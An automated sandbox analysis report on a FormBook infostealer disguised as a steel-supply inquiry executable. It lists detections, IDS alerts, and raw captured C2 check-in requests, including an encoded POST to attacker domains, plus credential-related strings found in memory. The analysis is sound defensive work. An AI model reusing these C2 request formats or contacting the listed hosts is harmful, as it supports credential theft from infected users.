Windows Analysis Report
INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

AV Detection

Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

Avira: detected

Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Virustotal: Detection: 52%			Perma Link
Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	ReversingLabs: Detection: 58%

Source: Yara match	File source: 0.2.INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2110804332.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112513266.0000000004930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2113082750.0000000004F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112607826.0000000004980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1356628507.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1357208647.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2112450897.0000000000C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1357255584.00000000030F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Compliance

Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000002.1356751237.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1262354489.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000002.1356751237.000000000100E000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1264456359.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000003.1358875567.0000000004ACB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000002.2113061079.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000003.1356722753.000000000491E000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000002.2113061079.0000000004C80000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000002.1356751237.0000000000E70000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1262354489.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000002.1356751237.000000000100E000.00000040.00001000.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1264456359.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, sdiagnhost.exe, 0000000A.00000003.1358875567.0000000004ACB000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000002.2113061079.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000003.1356722753.000000000491E000.00000004.00000020.00020000.00000000.sdmp, sdiagnhost.exe, 0000000A.00000002.2113061079.0000000004C80000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: sdiagnhost.pdb source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1356383526.00000000009C4000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1325440833.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, 1h36yydaHEcruJ.exe, 00000009.00000003.1295593337.0000000001355000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 1h36yydaHEcruJ.exe, 00000009.00000000.1278920480.00000000008AF000.00000002.00000001.01000000.00000007.sdmp, 1h36yydaHEcruJ.exe, 0000000B.00000000.1430815975.00000000008AF000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: sdiagnhost.pdbGCTL source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1356383526.00000000009C4000.00000004.00000020.00020000.00000000.sdmp, INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe, 00000000.00000003.1325440833.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, 1h36yydaHEcruJ.exe, 00000009.00000003.1295593337.0000000001355000.00000004.00000020.00020000.00000000.sdmp

Spreading

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Code function: 10_2_02CBCD40 FindFirstFileW,FindNextFileW,FindClose,

10_2_02CBCD40

Software Vulnerabilities

Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 4x nop then xor eax, eax		10_2_02CA9FC0
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 4x nop then pop edi		10_2_02CAE8C4
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 4x nop then mov ebx, 00000004h		10_2_04A804CE

Networking

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49695 -> 74.208.236.36:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49696 -> 74.208.236.36:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49699 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49694 -> 74.208.236.36:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49693 -> 74.208.236.36:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49698 -> 15.197.148.33:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49692 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49697 -> 15.197.148.33:80

Source: Joe Sandbox View	IP Address: 15.197.148.33 15.197.148.33
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 74.208.236.36 74.208.236.36

Source: Joe Sandbox View

ASN Name: TANDEMUS TANDEMUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /tsak/?NZX=LDapchnppPpDKdbp&FDC=YQHVXA7vk5Ejd4ZLrjcmRRVFj2S28kh5GkASxIA+KfBd6gRSELiW++EKJDSr3fSHhVfVzVIMxi/ALCU2icaEk0C5lnpuwBP+tTkpBnJwWERIYePvG2inYJKyTCXgbTjoOCLuJuLK4r6+ HTTP/1.1Host: www.dramavietsub.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; K01H Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36

Source: global traffic

HTTP traffic detected: GET /xumw/?FDC=6nidXIeTjwp+/8jNuUA4NOAmp7TMVRFP12WwgCMMdzORX2Ri86uOscPEUO1eXyN18jrqCkChD4uO80oJ0ZYEru1LcypcNZ+EzBt3sDp4nbllqs6w+McIm44y3SfnBO83FfhMFvVSb6SQ&NZX=LDapchnppPpDKdbp HTTP/1.1Host: www.truenorthcards.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.1; K01H Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.dramavietsub.net
Source: global traffic	DNS traffic detected: DNS query: www.truenorthcards.org
Source: global traffic	DNS traffic detected: DNS query: www.atepl.info

Source: unknown

HTTP traffic detected: POST /xumw/ HTTP/1.1Host: www.truenorthcards.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brCache-Control: no-cacheContent-Length: 216Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.truenorthcards.orgReferer: http://www.truenorthcards.org/xumw/User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; K01H Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36Data Raw: 46 44 43 3d 33 6c 4b 39 55 38 6d 47 74 41 5a 5a 7a 37 69 67 35 53 34 78 4e 50 30 62 69 4b 6d 73 58 42 74 47 2f 57 4c 37 32 44 64 50 58 6c 47 74 62 6e 68 6d 37 59 6a 75 6b 63 50 75 41 4f 78 5a 4f 55 64 63 36 41 2f 58 4c 6c 76 4b 5a 36 6e 4d 39 48 6b 42 67 34 34 4d 6f 50 51 62 64 6a 68 6c 54 70 58 44 72 68 63 77 6a 53 52 64 79 6f 39 2b 36 6f 4b 79 77 4b 34 77 34 66 64 6d 33 79 65 50 4f 64 74 5a 4b 34 51 47 58 2b 77 7a 64 4f 4c 58 30 43 4d 74 7a 4b 50 73 4e 63 55 47 59 45 36 72 65 36 71 6c 76 62 52 4c 75 78 74 46 32 44 50 50 63 56 4e 58 4f 30 52 49 37 51 43 32 30 4c 50 4a 79 58 66 73 61 50 30 72 47 78 47 43 6b 66 33 4c 65 65 45 6c 57 77 3d 3d Data Ascii: FDC=3lK9U8mGtAZZz7ig5S4xNP0biKmsXBtG/WL72DdPXlGtbnhm7YjukcPuAOxZOUdc6A/XLlvKZ6nM9HkBg44MoPQbdjhlTpXDrhcwjSRdyo9+6oKywK4w4fdm3yePOdtZK4QGX+wzdOLX0CMtzKPsNcUGYE6re6qlvbRLuxtF2DPPcVNXO0RI7QC20LPJyXfsaP0rGxGCkf3LeeElWw==

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-WS-RateLimit-Limit: 1000X-WS-RateLimit-Remaining: 999Date: Fri, 28 Mar 2025 07:57:02 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-WS-RateLimit-Limit: 1000X-WS-RateLimit-Remaining: 999Date: Fri, 28 Mar 2025 07:57:04 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-WS-RateLimit-Limit: 1000X-WS-RateLimit-Remaining: 999Date: Fri, 28 Mar 2025 07:57:07 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeX-WS-RateLimit-Limit: 1000X-WS-RateLimit-Remaining: 999Date: Fri, 28 Mar 2025 07:57:10 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>

Source: 1h36yydaHEcruJ.exe, 0000000B.00000002.2112450897.0000000000C76000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.atepl.info
Source: 1h36yydaHEcruJ.exe, 0000000B.00000002.2112450897.0000000000C76000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.atepl.info/4132/
Source: sdiagnhost.exe, 0000000A.00000003.1544750307.0000000007D29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: sdiagnhost.exe, 0000000A.00000003.1544750307.0000000007D29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sdiagnhost.exe, 0000000A.00000003.1544750307.0000000007D29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sdiagnhost.exe, 0000000A.00000003.1544750307.0000000007D29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sdiagnhost.exe, 0000000A.00000003.1544750307.0000000007D29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sdiagnhost.exe, 0000000A.00000003.1544750307.0000000007D29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: sdiagnhost.exe, 0000000A.00000003.1544750307.0000000007D29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sdiagnhost.exe, 0000000A.00000003.1544750307.0000000007D29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: sdiagnhost.exe, 0000000A.00000002.2111184637.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sdiagnhost.exe, 0000000A.00000002.2111184637.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sdiagnhost.exe, 0000000A.00000002.2111184637.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sdiagnhost.exe, 0000000A.00000002.2111184637.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: sdiagnhost.exe, 0000000A.00000002.2111184637.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: sdiagnhost.exe, 0000000A.00000002.2111184637.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sdiagnhost.exe, 0000000A.00000003.1540262640.0000000007CC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: sdiagnhost.exe, 0000000A.00000003.1544750307.0000000007D29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: sdiagnhost.exe, 0000000A.00000003.1544750307.0000000007D29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

E-Banking Fraud

Source: Yara match	File source: 0.2.INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2110804332.0000000002CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112513266.0000000004930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2113082750.0000000004F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2112607826.0000000004980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1356628507.0000000000AA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1357208647.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2112450897.0000000000C10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1357255584.00000000030F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ACD003 NtClose,		0_2_00ACD003
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2B60 NtClose,LdrInitializeThunk,		0_2_00EE2B60
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2C70 NtFreeVirtualMemory,LdrInitializeThunk,		0_2_00EE2C70
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2DF0 NtQuerySystemInformation,LdrInitializeThunk,		0_2_00EE2DF0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE35C0 NtCreateMutant,LdrInitializeThunk,		0_2_00EE35C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE4340 NtSetContextThread,		0_2_00EE4340
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE4650 NtSuspendThread,		0_2_00EE4650
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2AF0 NtWriteFile,		0_2_00EE2AF0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2AD0 NtReadFile,		0_2_00EE2AD0
